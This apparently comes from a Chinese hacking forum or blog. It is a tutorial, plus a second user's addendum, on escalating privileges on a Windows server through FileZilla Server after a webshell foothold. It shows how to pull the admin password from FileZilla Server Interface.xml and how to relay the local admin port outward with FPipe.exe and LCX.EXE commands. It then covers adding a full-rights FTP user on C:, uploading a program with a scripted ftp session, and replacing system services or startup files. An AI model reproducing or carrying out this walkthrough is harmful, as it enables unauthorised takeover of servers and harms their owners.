首先明確一下以下三個要素：

一、FileZilla Server安裝路徑，為得到FileZilla Server Interface.xml文件提供條件。
二、本地FileZilla Server要與服務(wù)器版本兼容，不然會提示版本不同，協(xié)議錯誤。
三、FileZilla Server中FileZilla Server Interface.xml文件保存了管理口令。
明白以上三點(diǎn)后現(xiàn)在就是嘗試如何連接到服務(wù)器上的FileZilla Server。
首先查看FileZilla Server Interface.xml中的內(nèi)容

name="Last Server Address" type="string"
127.0.0.1為服務(wù)器IP，此處默認(rèn)定義為127.0.0.1綁定在本地，不是綁定在0.0.0.0所以只能本地連接上去。
name="Last Server Port" type="numeric"
14147為FileZilla Server管理連接端口，默認(rèn)值14147
name="Last Server Password" type="string"
qwertyu為管理口令，此處口令為安裝時自定義，要在此文件中得到口令必須在配置中勾取保存口令選項。
現(xiàn)在說說實際中比較BT的狀況如何處理。
服務(wù)器對外只開放80，得到權(quán)限為webshell，服務(wù)器唯一安裝第三方軟件為FileZilla Server。數(shù)據(jù)庫為Ms-SQL2005，無Systemadmin權(quán)限賬戶，現(xiàn)有數(shù)據(jù)庫賬戶為DB權(quán)限，禁止了一切與數(shù)據(jù)庫有關(guān)的備份功能。
測試網(wǎng)絡(luò)環(huán)境，對外開放80，shell中netstat -an中看到有21,80,1433,3389三個外部端口，內(nèi)部端口有14147。經(jīng)測試發(fā)現(xiàn)，除80端口外其余全部無法連接。
如上情況下，要取得服務(wù)器權(quán)限能用到的只能是FileZilla Server。當(dāng)然，從外部看，服務(wù)器確實十分健碩，但從內(nèi)部看的話還是有機(jī)可乘的。首先明確下第一目的，首先要做的是得到FileZilla Server的管理權(quán)限，但是FileZilla Server的管理端口綁定在127.0.0.1:14147上，外部是無法訪問到的。
要得到外部訪問權(quán)限我們可以用LCX開發(fā)的LCX.EXE端口反彈轉(zhuǎn)發(fā)程序?qū)崿F(xiàn)，但是在現(xiàn)實測試的時候發(fā)現(xiàn)FileZilla Server對于網(wǎng)絡(luò)環(huán)境要求非常之高，這也是FileZilla Server的訪問協(xié)議造成的，直接用LCX.EXE轉(zhuǎn)發(fā)是極不穩(wěn)定的（在光纖環(huán)境下測試也連接不上）。再者網(wǎng)上的唯一一份FileZilla Server提權(quán)教程中提到了FPipe.exe程序。FPipe.exe程序為實現(xiàn)端口轉(zhuǎn)發(fā)功能而開發(fā)的，其作用可將本地端口監(jiān)聽數(shù)據(jù)轉(zhuǎn)發(fā)功能。在當(dāng)前 條件下，即使將本地綁定端口轉(zhuǎn)發(fā)到外部端口也是連接不上的，估計是硬防。
現(xiàn)在可以知道環(huán)境是極其BT的，尋找突破的道路是需要發(fā)掘的，我的方法是，用FPipe.exe將14147端口轉(zhuǎn)發(fā)到外部其他端口，再用LCX.EXE 將FPipe.exe端口轉(zhuǎn)發(fā)出來。FPipe.exe -v -l 1234 -r 14147 127.0.0.1。本地LCX.EXE -LISTEN 1234 14147。服務(wù)器上LCX.EXE -SLAVE 本機(jī)IP 1234 服務(wù)器IP 1234。這樣就能實現(xiàn)本地連接了，但是還是對網(wǎng)絡(luò)環(huán)境要求很高的。
然后本地連接上FileZilla Server管理，然后添加一個FTP用戶，用戶目錄設(shè)置為C:勾取所有權(quán)限操作選項。FileZilla Server添加FTP用戶的工作就結(jié)束了。
現(xiàn)在是提升權(quán)限的問題了，F(xiàn)ileZilla Server不比serv-U，可以quote site exec執(zhí)行dos命令（不知道是不行還是有其他參數(shù)可以實現(xiàn)，我不懂...）要實現(xiàn)提權(quán)的話可以FTP登錄上去操作文件管理，如替換系統(tǒng)服務(wù)、替換系統(tǒng) 文件、將程序置于啟動目錄等等。
現(xiàn)在的問題是服務(wù)器開放了21端口，但是外部是不能訪問的，F(xiàn)TP端口轉(zhuǎn)發(fā)出來也不穩(wěn)定，極易斷開。現(xiàn)在辦法是直接從服務(wù)器上登錄服務(wù)器FTP。反彈一個cmdshell，然后寫個ftp自動處理腳本
open 127.0.0.1 21
user
pass
put soft.exe 存放目錄
bye
然后本地ftp.exe -s:ftp.txt就能實現(xiàn)本地上傳本地了。就此，以FileZilla Server提升權(quán)限也實現(xiàn)了。
 

下面其他網(wǎng)友的補(bǔ)充：

FileZilla Server應(yīng)該好多牛人都知道怎么提權(quán)的了吧,很簡單的,我再啰嗦一次
管理員密碼以及端口都是保存在FileZilla Server Interface.xml文件里的
FileZilla Server Interface.xml內(nèi)容大致如下

端口是14147 密碼是cool 其中14147是管理端口 例如su的43859一樣

FileZilla Server.xml文件是保存ftp用戶密碼用的 FileZilla Server.xml用戶密碼是32位加密的md5
FileZilla Server.xml大致內(nèi)容如下：

 

該用戶的權(quán)限
好了下面介紹下怎么利用吧,只需要把14147端口轉(zhuǎn)發(fā)出去,然后利用管理密碼登陸進(jìn)去添加用戶即可
演示一下好了
把端口轉(zhuǎn)發(fā)出去

再本地打開FileZilla Server輸入IP端口密碼

表示成功了

剩下的自己可以添加ftp用戶為所欲為了,關(guān)于怎么添加用戶我不啰嗦了,很簡單的，實在不會就去下載個中文版的就好了

最新評論